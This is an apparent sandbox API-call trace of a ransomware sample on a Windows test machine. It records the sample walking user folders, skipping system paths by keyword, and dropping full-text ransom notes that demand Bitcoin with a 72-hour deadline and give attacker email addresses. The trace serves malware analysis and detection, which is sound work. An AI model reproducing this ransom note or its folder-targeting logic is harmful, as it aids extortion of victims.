	[0190.354] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.355] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\links\\*.*", lpSrch="programdata") returned 0x0
	[0190.355] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0190.355] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0190.355] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8af62deb, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.355] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0190.356] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0190.356] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1
	[0190.356] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1
	[0190.356] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af3d221, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8af3d221, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8afaf44f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0190.356] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af3d221, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8af3d221, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8af3d221, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0190.356] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af3d221, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8af3d221, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8af3d221, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0190.356] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0190.356] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0190.357] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1
	[0190.357] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1
	[0190.357] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1
	[0190.357] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0190.357] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0190.357] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings"
	[0190.357] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Local Settings" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings"
	[0190.357] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\"
	[0190.357] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\"
	[0190.358] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*.*"
	[0190.358] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\local settings\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af3d221, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8af3d221, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8af3d221, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0190.359] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0190.359] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Local Settings" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings"
	[0190.359] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*.*"
	[0190.359] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.359] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.359] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\HELP_DECRYPT_YOUR_FILES.TXT") returned 64
	[0190.360] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\local settings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.368] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0190.368] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0190.370] CloseHandle (hObject=0x380) returned 1
	[0190.371] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.371] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.371] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0190.372] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0190.372] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\local settings\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.373] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0190.373] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0190.373] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0190.373] CloseHandle (hObject=0x380) returned 1
	[0190.373] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.374] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.374] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0190.374] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\HELP_DECRYPT_YOUR_FILES.HTML") returned 65
	[0190.374] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\local settings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.374] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0190.374] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0190.379] CloseHandle (hObject=0x380) returned 1
	[0190.379] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.380] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.380] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.380] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0190.381] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.381] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\local settings\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0190.382] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0190.382] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.382] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0190.382] CloseHandle (hObject=0x380) returned 1
	[0190.382] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Local Settings\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\local settings\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af3d221, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8af3d221, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8af3d221, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0190.383] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0190.383] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb803d629, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb803d629, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0190.383] lstrcmpW (lpString1="Music", lpString2="..") returned 1
	[0190.383] lstrcmpW (lpString1="Music", lpString2=".") returned 1
	[0190.383] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0190.383] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0190.383] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music") returned="C:\\Users\\RDhJ0CNFevzX\\Music"
	[0190.383] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music") returned="C:\\Users\\RDhJ0CNFevzX\\Music"
	[0190.383] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.384] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.384] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*"
	[0190.384] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb803d629, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x891367b7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0190.384] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*") returned 31
	[0190.384] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.384] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\*.*", cchLength=0x1f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\*.*") returned 0x1f
	[0190.384] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="windows") returned 0x0
	[0190.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="boot") returned 0x0
	[0190.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="system volume information") returned 0x0
	[0190.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.385] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.385] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="temp") returned 0x0
	[0190.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="program files") returned 0x0
	[0190.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.386] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="appdata") returned 0x0
	[0190.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.387] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="application data") returned 0x0
	[0190.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.387] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="winnt") returned 0x0
	[0190.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.387] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="tmp") returned 0x0
	[0190.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.387] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="cache") returned 0x0
	[0190.388] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.388] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.388] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.388] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="webcache") returned 0x0
	[0190.388] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.388] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="inetcache") returned 0x0
	[0190.388] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.389] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="nvidia") returned 0x0
	[0190.389] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.389] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="packages") returned 0x0
	[0190.389] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.389] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="cookies") returned 0x0
	[0190.389] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.389] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\*.*", lpSrch="programdata") returned 0x0
	[0190.389] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb803d629, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0x891367b7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.389] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f4b4ef0, ftCreationTime.dwHighDateTime=0x1d97041, ftLastAccessTime.dwLowDateTime=0x9d63b90, ftLastAccessTime.dwHighDateTime=0x1d97626, ftLastWriteTime.dwLowDateTime=0x9d63b90, ftLastWriteTime.dwHighDateTime=0x1d97626, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="381iZ9BIYF", cAlternateFileName="381IZ9~1")) returned 1
	[0190.390] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e37cc60, ftCreationTime.dwHighDateTime=0x1d96a36, ftLastAccessTime.dwLowDateTime=0xee07a9c0, ftLastAccessTime.dwHighDateTime=0x1d96d93, ftLastWriteTime.dwLowDateTime=0xee07a9c0, ftLastWriteTime.dwHighDateTime=0x1d96d93, nFileSizeHigh=0x0, nFileSizeLow=0x592f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3H3UVQNynSqrnC.m4a", cAlternateFileName="3H3UVQ~1.M4A")) returned 1
	[0190.390] lstrcmpW (lpString1="3H3UVQNynSqrnC.m4a", lpString2="..") returned 1
	[0190.390] lstrcmpW (lpString1="3H3UVQNynSqrnC.m4a", lpString2=".") returned 1
	[0190.390] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
